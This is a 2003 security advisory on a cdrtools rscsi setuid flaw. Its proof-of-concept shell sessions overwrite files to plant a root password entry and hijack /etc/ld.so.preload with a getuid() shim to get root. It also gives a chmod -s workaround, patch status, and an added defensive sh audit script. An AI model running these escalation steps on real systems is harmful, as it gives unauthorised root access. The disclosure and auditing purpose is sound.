[EXPL] Cdrtools Local Root Exploit

From: SecuriTeam (support_at_securiteam.com)
Date: 08/05/03

    To: list@securiteam.com
    Date: 5 Aug 2003 11:41:57 +0200
    
    

    The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com

      Cdrtools Local Root Exploit
    ------------------------------------------------------------------------

    SUMMARY

    Cdrecord (<http://www.fokus.gmd.de/research/cc/glone/employees/joerg.schilling/private/cdrecord.html>) supports DVD-R and DVD-RW with all known DVD writers on all UNIX-like operating systems and on Win32. A setuid helper binary has been found to contain a vulnerability that allows files to be overwritten by non-root users.

    DETAILS

    Vulnerable Systems:
     * cdrtools version 2.x and below

    Immune Systems:
     * cdrtools version 2.01a18

    A vulnerability in cdrtools allows local attackers to overwrite files. One
    side effect of the overwriting process is that the file's permissions
    become writable by the user calling the rscsi program. This can allow a
    non-root user to gain local root on the machine that has cdrtools
    installed.

    Initial attempts to exploit this issue failed for an unknown reason;
    however, this is still a valid method of attack. We make use of the
    first argument passed to rscsi in order to choose the file we wish to
    write to.

    Because of the output that rscsi writes, we make use of 0x08 (backspace)
    in order to delete some of the characters that would otherwise be written.
    This attack method relies on placing a line of text at the end of a file.
    Please note that two other lines of garbage will also be placed in the
    file, which may cause other issues.

    Proof of Concept:
    elguapo@gentoo elguapo $ echo C`echo -e "\x08\x08\x08\x08\x08\x08\x08\x08\x08\x08r00t::0:0:root:/:/bin/bash\x0a"` | /opt/schily/sbin/rscsi /tmp/lala
    Segmentation fault (this segfault is not related to the security issue)

    elguapo@gentoo elguapo $ cat /tmp/lala
    rscsid: user id 1000, name elguapo
    rmt: stdin is a PIPE
    r00t::0:0:root:/root:/bin/bash

    When attempting to echo this line to the password file we get the
    following error (Note that the password file is overwritten at this
    point):

    E0
    Illegal user id for RSCSI server
    0

    elguapo@gentoo elguapo $ cat /etc/passwd
    rscsid: Illegal user '(NULL POINTER)' id 1000 for RSCSI server
    rscsid:>E 0 (Illegal user id for RSCSI server) []

    We do however have another exploitation option, such as the one listed
    below:

    [kf@vegeta kf]$ ls -al /etc/ld.so.preload
    ls: /etc/ld.so.preload: No such file or directory

    [kf@vegeta kf]$ cat > oops.c
    int getuid(void)
    {
    return(0);
    }

    [kf@vegeta kf]$ gcc -c -o oops.o oops.c
    [kf@vegeta kf]$ ld -shared -o oops.so oops.o
    [kf@vegeta kf]$ ls -al oops.so
    -rwxrwxr-x 1 kf kf 1714 Jul 30 18:53 oops.so

    [kf@vegeta kf]$ echo duh_kf | /opt/schily/sbin/rscsi /etc/ld.so.preload
    E0
    Garbage command
    0

    Note that we now have write permissions to /etc/ld.so.preload
    -rw-rw-r-- 1 root kf 1 Jul 30 19:29 /etc/ld.so.preload

    So to gain elevated privileges all we need to do is:
    [kf@vegeta kf]$ echo /home/kf/oops.so > /etc/ld.so.preload
    [kf@vegeta kf]$ su
    [root@vegeta kf]# rm /etc/ld.so.preload
    rm: remove regular file `/etc/ld.so.preload'? y
    [root@vegeta kf]# id
    uid=0(root) gid=0(root)
    groups=0(root),1(bin),2(daemon),3(sys),4(adm),6(disk),10(wheel)

    Workaround:
    chmod -s /opt/schily/sbin/rscsi
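
    The following POSIX sh audit script is an added example; it is not part of the advisory and not cdrtools' own code. It checks the two conditions the privilege escalation above depends on: a setuid rscsi helper (the state the `chmod -s` workaround removes) and an ld.so.preload file, or a library it names, that is writable by group or others, which is the `-rw-rw-r--` state shown in the advisory's `ls` output. Only the path /opt/schily/sbin/rscsi comes from the advisory; the sandbox directory layout, the file names and the modes in `make_sandbox` are constructed here so the checks can be exercised offline.

```shell
#!/bin/sh
# Added audit script, not part of the advisory or of cdrtools. It checks the two
# conditions the advisory's privilege escalation depends on: a setuid rscsi
# helper, and an ld.so.preload (or a library it names) that a non-root user can
# write. Paths are parameters, so the checks run against a live host or against
# the constructed sandbox built by make_sandbox below.
# Only /opt/schily/sbin/rscsi comes from the advisory; everything else is assumed.

# First ten characters of ls -l, e.g. "-rw-rw-r--"; avoids GNU-only stat flags.
mode_string() {
    ls -ld "$1" | cut -c1-10
}

# Succeeds (0) if FILE grants write permission to its group or to others.
writable_by_non_owner() {
    wbno_mode=$(mode_string "$1")
    case "$wbno_mode" in
        ?????w????|????????w?) return 0 ;;
    esac
    return 1
}

# Check a helper binary. Fails (1) when it is setuid, which is the state the
# advisory's workaround, "chmod -s", removes.
audit_helper() {
    if [ -e "$1" ] && [ -u "$1" ]; then
        echo "RISK: $1 is setuid ($(mode_string "$1")); workaround: chmod -s $1"
        return 1
    fi
    echo "ok: $1 is not setuid"
    return 0
}

# Check a preload file. Fails (1) when the file itself, or any library it lists,
# is writable by group/other, or when a listed library is missing.
audit_preload() {
    ap_file=$1
    ap_rc=0
    if [ ! -e "$ap_file" ]; then
        echo "ok: no preload file at $ap_file"
        return 0
    fi
    if writable_by_non_owner "$ap_file"; then
        echo "RISK: $ap_file is writable by group/other ($(mode_string "$ap_file"))"
        ap_rc=1
    fi
    while IFS= read -r ap_lib || [ -n "$ap_lib" ]; do
        case "$ap_lib" in ''|'#'*) continue ;; esac
        if [ ! -e "$ap_lib" ]; then
            echo "RISK: $ap_file names missing library $ap_lib"
            ap_rc=1
        elif writable_by_non_owner "$ap_lib"; then
            echo "RISK: preloaded $ap_lib is writable by group/other ($(mode_string "$ap_lib"))"
            ap_rc=1
        else
            echo "ok: preloaded $ap_lib is not writable by group/other"
        fi
    done < "$ap_file"
    return $ap_rc
}

# Run both checks; fails (1) if either one reports a risk.
audit_host() {
    ah_rc=0
    audit_helper "$1" || ah_rc=1
    audit_preload "$2" || ah_rc=1
    return $ah_rc
}

# Constructed sandbox reproducing the post-exploitation state shown in the
# advisory: a setuid helper and a group-writable preload file (-rw-rw-r--)
# pointing at a library in a user's home directory. Prints the sandbox path.
make_sandbox() {
    ms_dir=$(mktemp -d "${TMPDIR:-/tmp}/rscsi-audit.XXXXXX")
    mkdir -p "$ms_dir/etc" "$ms_dir/sbin" "$ms_dir/home/kf"
    : > "$ms_dir/sbin/rscsi"
    chmod 4755 "$ms_dir/sbin/rscsi"
    : > "$ms_dir/home/kf/oops.so"
    chmod 775 "$ms_dir/home/kf/oops.so"
    echo "$ms_dir/home/kf/oops.so" > "$ms_dir/etc/ld.so.preload"
    chmod 664 "$ms_dir/etc/ld.so.preload"
    echo "$ms_dir"
}

# Demonstration: audit the sandbox, apply the workaround, audit again.
run_demo() {
    sb=$(make_sandbox)
    echo "== before workaround =="
    audit_host "$sb/sbin/rscsi" "$sb/etc/ld.so.preload" || echo "result: findings"
    echo "== after chmod -s and restoring mode 644 =="
    chmod -s "$sb/sbin/rscsi"
    chmod 644 "$sb/etc/ld.so.preload" "$sb/home/kf/oops.so"
    audit_host "$sb/sbin/rscsi" "$sb/etc/ld.so.preload" && echo "result: clean"
    rm -rf "$sb"
}

run_demo
```

    Running the script as-is exercises the sandbox; on a live host, call `audit_host /opt/schily/sbin/rscsi /etc/ld.so.preload` instead. The permission test deliberately parses the `ls -l` mode string rather than calling `stat`, so the same function works on Linux and BSD userlands; a non-existent preload file is reported as clean because that is the normal state of a host that has never had one.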

    Vendor Status:
    The problem has been patched in cdrtools version 2.01a18.

    ADDITIONAL INFORMATION

    The information has been provided by KF <kf@secnetops.com>.
